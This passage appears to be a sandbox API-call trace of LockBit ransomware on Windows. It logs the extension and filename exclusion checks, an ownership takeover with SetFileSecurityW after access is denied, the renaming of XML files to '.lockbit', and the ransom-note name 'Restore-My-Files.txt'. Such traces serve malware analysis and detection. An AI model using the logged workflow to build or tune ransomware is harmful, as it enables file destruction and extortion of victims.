dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.028] FindNextFileW (in: hFindFile=0x2e32d0, lpFindFileData=0x344c7a8 | out: lpFindFileData=0x344c7a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cb5dcd, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1cb5dcd, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f669cc7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xc5e, dwReserved0=0xfd7a0866, dwReserved1=0x1ca0431, cFileName="base_ca.xml", cAlternateFileName="")) returned 1 [0081.028] lstrcmpiW (lpString1=".", lpString2="base_ca.xml") returned -1 [0081.028] lstrcmpiW (lpString1="..", lpString2="base_ca.xml") returned -1 [0081.028] PathFindExtensionW (pszPath="base_ca.xml") returned=".xml" [0081.029] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0081.029] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0081.029] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0081.029] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0081.029] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0081.029] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0081.029] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0081.029] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0081.029] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0081.029] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0081.029] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0081.029] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0081.029] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0081.029] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0081.029] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0081.029] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0081.029] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0081.029] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0081.029] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0081.029] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0081.029] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0081.030] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0081.030] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0081.030] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0081.030] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0081.030] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0081.030] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0081.030] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0081.030] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0081.030] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0081.030] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0081.030] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0081.030] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0081.030] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0081.030] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0081.030] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0081.030] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0081.030] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0081.030] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0081.030] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0081.030] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0081.030] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0081.031] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0081.031] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0081.031] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0081.031] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0081.031] wsprintfW (in: param_1=0x344c6e0, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0081.031] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="base_ca.xml") returned 1 [0081.031] lstrcmpiW (lpString1="ntldr", lpString2="base_ca.xml") returned 1 [0081.031] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="base_ca.xml") returned 1 [0081.031] lstrcmpiW (lpString1="bootsect.bak", lpString2="base_ca.xml") returned 1 [0081.031] lstrcmpiW (lpString1="autorun.inf", lpString2="base_ca.xml") returned -1 [0081.031] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\") returned="" [0081.031] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned=".xml" [0081.031] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0081.031] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0081.031] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0081.031] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0081.031] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0081.031] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0081.031] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0081.031] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0081.031] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0081.031] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0081.032] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0081.032] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0081.032] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0081.032] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0081.032] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0081.032] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0081.032] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0081.032] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0081.032] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0081.032] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0081.032] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0081.032] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0081.032] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0081.032] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0081.032] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0081.032] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0081.032] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0081.032] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0081.032] wsprintfW (in: param_1=0x344be80, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml.lockbit") returned 90 [0081.032] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0081.032] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml.lockbit")) returned 0 [0081.033] GetLastError () returned 0x5 [0081.033] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0081.033] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0081.033] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0081.034] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0081.034] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0081.034] NtOpenFile (in: FileHandle=0x344be28, DesiredAccess=0x80, ObjectAttributes=0x344bcd8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344bcd0, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344be28*=0x3b8, IoStatusBlock=0x344bcd0*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0081.035] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0081.035] NtQueryInformationFile (in: FileHandle=0x3b8, IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0) returned 0x0 [0081.046] NtClose (Handle=0x3b8) returned 0x0 [0081.046] RtlFreeAnsiString (AnsiString="\\") [0081.046] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344be64 | out: TokenHandle=0x344be64*=0x3b8) returned 1 [0081.046] malloc (_Size=0x200) returned 0x53fcc0 [0081.046] GetTokenInformation (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344be60 | out: TokenInformation=0x53fcc0, ReturnLength=0x344be60) returned 1 [0081.046] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344be48, dwRevision=0x1 | out: pSecurityDescriptor=0x344be48) returned 1 [0081.046] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344be48, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344be48) returned 1 [0081.046] CloseHandle (hObject=0x3b8) returned 1 [0081.047] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344be48) returned 1 [0081.047] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344be48) returned 1 [0081.048] free (_Block=0x53fcc0) [0081.048] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0081.048] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml.lockbit")) returned 1 [0081.048] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0081.048] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0081.049] malloc (_Size=0x40068) returned 0x20abae0 [0081.049] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x20abaf8 | out: lpFileSize=0x20abaf8*=3166) returned 1 [0081.049] ReadFile (in: hFile=0x3b8, lpBuffer=0x20abb14, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0) returned 0x0 [0081.051] GetLastError () returned 0x3e5 [0081.051] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main") returned 1 [0081.051] wsprintfW (in: param_1=0x344bc38, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\Restore-My-Files.txt") returned 91 [0081.051] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.051] FindNextFileW (in: hFindFile=0x2e32d0, lpFindFileData=0x344c7a8 | out: lpFindFileData=0x344c7a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cdbf2a, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1cdbf2a, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f68fe25, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2e2, dwReserved0=0xfd7a0866, dwReserved1=0x1ca0431, cFileName="base_heb.xml", cAlternateFileName="")) returned 1 [0081.051] lstrcmpiW (lpString1=".", lpString2="base_heb.xml") returned -1 [0081.051] lstrcmpiW (lpString1="..", lpString2="base_heb.xml") returned -1 [0081.051] PathFindExtensionW (pszPath="base_heb.xml") returned=".xml" [0081.051] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0081.051] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0081.051] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0081.051] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0081.051] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0081.051] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0081.051] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0081.052] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0081.052] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0081.052] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0081.052] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0081.052] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0081.052] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0081.052] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0081.052] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0081.052] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0081.052] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0081.052] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0081.052] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0081.052] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0081.052] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0081.052] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0081.052] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0081.052] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0081.052] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0081.052] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0081.052] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0081.052] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0081.053] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0081.053] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0081.053] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0081.053] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0081.053] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0081.053] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0081.053] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0081.053] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0081.053] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0081.053] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0081.053] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0081.053] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0081.053] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0081.053] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0081.053] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0081.053] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0081.053] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0081.053] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0081.053] wsprintfW (in: param_1=0x344c6e0, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0081.053] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="base_heb.xml") returned 1 [0081.053] lstrcmpiW (lpString1="ntldr", lpString2="base_heb.xml") returned 1 [0081.053] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="base_heb.xml") returned 1 [0081.053] lstrcmpiW (lpString1="bootsect.bak", lpString2="base_heb.xml") returned 1 [0081.053] lstrcmpiW (lpString1="autorun.inf", lpString2="base_heb.xml") returned -1 [0081.053] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\") returned="" [0081.053] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned=".xml" [0081.054] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0081.054] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0081.054] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0081.054] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0081.054] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0081.054] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0081.054] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0081.054] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0081.054] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0081.054] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0081.054] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0081.054] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0081.054] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0081.054] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0081.054] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0081.054] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0081.054] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0081.054] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0081.054] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0081.054] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0081.054] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0081.054] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0081.054] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0081.054] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0081.054] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0081.054] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0081.054] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0081.054] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0081.055] wsprintfW (in: param_1=0x344be80, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml.lockbit") returned 91 [0081.055] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0081.055] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml.lockbit")) returned 0 [0081.065] GetLastError () returned 0x5 [0081.065] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0081.065] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0081.065] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0081.065] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0081.066] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0081.066] NtOpenFile (in: FileHandle=0x344be28, DesiredAccess=0x80, ObjectAttributes=0x344bcd8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344bcd0, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344be28*=0x3b0, IoStatusBlock=0x344bcd0*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0081.066] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0081.066] NtQueryInformationFile (in: FileHandle=0x3b0, IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0) returned 0x0 [0081.197] NtClose (Handle=0x3b0) returned 0x0 [0081.198] RtlFreeAnsiString (AnsiString="\\") [0081.198] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344be64 | out: TokenHandle=0x344be64*=0x3b0) returned 1 [0081.198] malloc (_Size=0x200) returned 0x53fcc0 [0081.198] GetTokenInformation (in: TokenHandle=0x3b0, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344be60 | out: TokenInformation=0x53fcc0, ReturnLength=0x344be60) returned 1 [0081.198] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344be48, dwRevision=0x1 | out: pSecurityDescriptor=0x344be48) returned 1 [0081.198] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344be48, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344be48) returned 1 [0081.198] CloseHandle (hObject=0x3b0) returned 1 [0081.198] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344be48) returned 1 [0081.198] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344be48) returned 1 [0081.199] free (_Block=0x53fcc0) [0081.199] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0081.199] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml.lockbit")) returned 1 [0081.200] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b0 [0081.200] CreateIoCompletionPort (FileHandle=0x3b0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0081.200] malloc (_Size=0x40068) returned 0x206b860 [0081.200] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=738) returned 1 [0081.200] ReadFile (in: hFile=0x3b0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0081.229] GetLastError () returned 0x3e5 [0081.229] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main") returned 1 [0081.229] wsprintfW (in: param_1=0x344bc38, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\Restore-My-Files.txt") returned 91 [0081.229] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.229] FindNextFileW (in: hFindFile=0x2e32d0, lpFindFileData=0x344c7a8 | out: lpFindFileData=0x344c7a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d02087, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d02087, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f68fe25, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x324, dwReserved0=0xfd7a0866, dwReserved1=0x1ca0431, cFileName="base_jpn.xml", cAlternateFileName="")) returned 1 [0081.229] lstrcmpiW (lpString1=".", lpString2="base_jpn.xml") returned -1 [0081.229] lstrcmpiW (lpString1="..", lpString2="base_jpn.xml") returned -1 [0081.229] PathFindExtensionW (pszPath="base_jpn.xml") returned=".xml" [0081.229] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0081.229] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0081.229] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0081.229] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0081.229] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0081.229] lstrcmpiW 